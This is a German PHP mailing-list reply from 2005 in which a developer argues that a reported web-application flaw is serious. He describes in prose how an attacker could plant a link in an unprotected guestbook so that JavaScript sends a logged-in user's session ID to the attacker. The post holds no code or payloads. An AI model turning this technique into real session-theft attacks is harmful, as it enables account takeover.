[php] Zeitkontrolle

Sebastian Mendel lists at sebastianmendel.de
Mit Okt 12 16:08:05 CEST 2005

Stefan Brueckmann wrote:
> Hallo Peter Prochaska,
>
> am Mittwoch, 12. Oktober 2005 13:59 schriebst du:

> Kannst du uns auch  verraten wie der Böse Bube mitbekommt das sein
> Empfänger irgendwo eingeloggt ist?
> Oder warum die Leute, währen sie in meinem genialen Webfrontend
> eingeloggt, sind noch Zeit haben E-mail zu beantworten?
> ;-)

das braucht Peter euch nicht zu erzählen, das steht überall im Web! ...
ich find es etwas peinlich das man Programmierern erst erklären muss wie
schwerwiegend eine Sicherheitslücke ist nachdem sie ihm erklärt wurde ...

der 'böse Bube' könnte es blindlings probieren ... er könnte ein
Gästebuch in irgendeiner Community kompromitieren, oder irgendeinen
anderen Bereich wo die Benutzereingaben nicht genügend geprüft werden
und andere Benutzer darauf zugreifen, z. B. posted er einen Link welcher
genau den oben erwähnten Fehler ausnutzt und dann per JavaScript die
Session-ID des angemeldten Benutzers irgendwohin schickt, oder beliebige
andere Aktionen ausführen ...

--
Sebastian Mendel

www.sebastianmendel.de